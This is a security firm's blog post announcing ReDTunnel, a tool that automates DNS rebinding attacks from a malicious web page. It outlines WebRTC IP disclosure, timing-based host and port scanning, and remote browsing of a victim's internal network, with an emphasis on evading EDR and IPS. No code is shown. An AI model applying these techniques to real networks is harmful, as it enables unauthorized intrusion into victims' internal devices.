Scorpiones Group

ReDTunnel - Redefining DNS Rebinding Attack

By Nimrod Levy and Tomer Zait

Introduction Have you ever thought about how to access a victim's internal network without running Malware on his computer or using 0day?

Did you ever imagined that you browsing to a website containing a sophisticated script that will provide you with full access Tunnel to the victim's internal network?
That exactly the reason we decided to write the ReDTunnel tool.
The goal is to use the existing tools in the victim's operating system (browser),
in order to gain full control of its network, with an emphasis on evading EDR systems and without raising alerts in the detection systems (IPS).
We have decided to combine reconnaissance techniques in JavaScript and DNS Rebinding attacks to fulfill our goals,
all you have to do is get the victim to browse a website that contains the script that connects to the ReDTunnel core, and the game begins!
After about two minutes,
you can completely browse the web assets that belong to the victim (For example, Router, NAS, etc.) Needless to say that this is a great way to start a successful Red Team Operation.

DNS Rebinding
DNS rebinding is a class of exploit in which the attacker initiates repeated DNS queries to a domain under their control,
while the first query would return a valid response that passes security checks, and the subsequent queries will return a malicious response that targets the internal network.
The DNS rebinding attack technique normally requires detailed knowledge of a target network,
but a new tool by security researchers Tomer Zait (Principal security researcher at F5 Networks) and Nimrod Levy (CTO, co-founder at Scorpiones) – dubbed ReDTunnel – means a hacker would need “zero knowledge about the target” in order to run an attack.
Using JavaScript in a malicious web page to gain control over a user’s internal network’s HTTP resources.
The attack can bypass security controls such as cross-origin resource sharing (CORS).

The result is that you open your browser, wait until the victim visits your website, and then start browsing the internal websites in their network.
It’s a great tool especially if you’re part of a red team.
We recommend you read more about DNS Rebinding in this link.

The limitations in DNS Rebinding
The DNS Rebinding attack requires a lot of information about the victim in order to accomplish the access,
for example, know which browser the victim used, know the IP subnet of the victim’s network, etc.
In the days leading up to ReDTunnel,
all this information had to be collected in advance and the attacker had to write the scripts that will use the information collected to attack the victim.
To avoid these limitations, we used JavaScript Reconnaissance techniques. JavaScript Reconnaissance
Reconnaissance is the process of collecting information about the victim,
for example, which browser does the victim use? which extensions in its browser? Can I get its internal IP address? Which IP addresses are open in his network? Which assets are available to him on the network, etc.
You will be surprised of how much JavaScript can help us in this work and how much information can be collected through one script.
So how is the reconnaissance process is working using JavaScript? There are a lot of methods for collecting information,
let's base on one example:
When we call an existing IP address with a port that is not open, we get an error in less than 2 seconds about connection failure (REFUSED_CONNECTION_ERR :: net.),
Also, we get a different error from an IP address that does not exist after more than 2 seconds (OUT_TIMED_CONNECTION_ERR :: net),
We can’t test the type of error in JavaScript, but we can measure the times and know that there was some error.

Let's try to understand the mechanism
Victim Architecture

In the picture above you can see the browser of the victim who makes a connection calles to different IP addresses,
when the red arrows indicate a connection to an IP address that unreachable on the network, while the black arrows indicate IP addresses are reachable on the network.
When an internal IP address is dialed on the network, the browser querying the router whether it knows the IP address,
if he knows it,
he will return a quick reply to the fact that the port is closed and therefore we will receive a quick answer about the closed port and we'll get an error about the rejected connection - so far it's clear.
If we try to access an unreachable IP address, the browser will wait for timeout and we will be able to know for certain IP address is unreachable.
It's important to note that each browser has its own limitations, such as the method we mentioned will work on Google Chrome but will not work in FireFox.
in FireFox, we can send many more requests at the same time so we will not have to use this method just to know that we are only sending requests to reachable IP addresses.

ReDTunnel So as we said in order for ReDTunnel to succeed we need to collect information about the victim,
so we've used with a list of the order of action of reconnaissance JavaScript Techniques Miscellaneous:
  1. Disclosure of internal IP address:
    In order to discover the internal IP address we used WebRTC
    Example script:
    WebRTC Code
  2. Detection of IP addresses on the network:
    To discover the reachable IP addresses in the network we used with timing attack via Ajax requests.
    The example script you can find here
  3. Discover open ports that contains HTTP services:
    To discover open ports based on HTTP services, we created a DOM event whose source points to the port we are checking.
    according to the timings and events we will know if behind this port there really is an HTTP service, the event we need is "onload" event, if "onload" event is called then there is an HTTP service port behind it.
    A sample script can be found here
    The following illustration presents the RedTunnel architecture and explains the processes behind the scenes:
    ReDTunnel Architecture
    1. The victim browses to a site that contains the ReDTunnel (Core).
      the ReDTunnel Core service contains both the attack side and the management side.
    2. ReDTunnel collection of victim's Information: Finding the victim's internal address, using the internal address to scan the IP addresses on the victim network, then find HTTP services on the victim’s network IP addresses.
      And of course reporting all findings to the ReDTunnel (Core) management server.
    3. While victim's data is collected, the DNS Rebinding attack is executed automatically (via communication between the Core service and the DNS service.)
    4. The attacker uses the Admin interface to browse applications on the victim's network or on the victim's computer (localhost) using his own browser and can even run automated scripts like SQLmap (if you send the ReDTunnel cookie content.) ReDTunnel example

In conclusion The ReDTunnel tool redefined the Rebinding DNS attack by automating the attack,
gathering the information before the attack and the management of the victims in a safe and sophisticated manner allows the attacker to physically surf the internal network of the victims and run automatic tools on them,
as well as the PATCH / PUT / DELETE methods and Basic Authentication Login for the attacker.

For download the ReDTunnel tool, click here!

Tags: DNS Rebinding Red Team

Contact Us